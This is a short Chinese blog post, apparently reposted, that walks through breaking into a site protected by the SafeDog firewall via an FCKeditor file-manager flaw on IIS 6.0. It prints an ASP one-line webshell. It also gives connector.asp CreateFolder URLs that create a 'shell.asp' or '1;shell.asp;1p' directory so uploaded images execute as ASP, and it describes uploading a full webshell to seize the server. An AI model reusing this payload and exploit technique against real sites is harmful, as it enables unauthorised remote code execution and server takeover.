FCK变异目录突破安全狗

作者：admin 发布于：2013-10-3 23:28 Thursday 分类：网络转载

安全狗升级了还是各种被咬，咬的蛋疼了。POST数据直接拦截！

 

今天遇到个FUK还是安全狗，在上传文件后自动重命名。

 

一句话<%Y=request(“X”)%> <%execute(Y)%> 

 

直接插入图片一句话貌似安全狗对此post不会拦截。

IIS6.0下解析创建文件夹.变_无语

用FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684

创建shell.asp成功

然后自己上图片一句话，上传成功但是在解析后直接被狗咬住了

 

搞了好久一直被咬的没有法办。

最后想到用FCK来创建变异目录利用如下

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/ 1;shell.asp;1p&NewFolderName=z&uuid=1244789975684

 

来创建1;shell.asp;1p文件夹

后面继续上传

这下应该解析了。

一句话上传成功。

菜刀连接肯定不行的。

用利用HTML的一句话客户端直接连接

直接上传大马3.txt成功成功解析拿下

标签: fck0day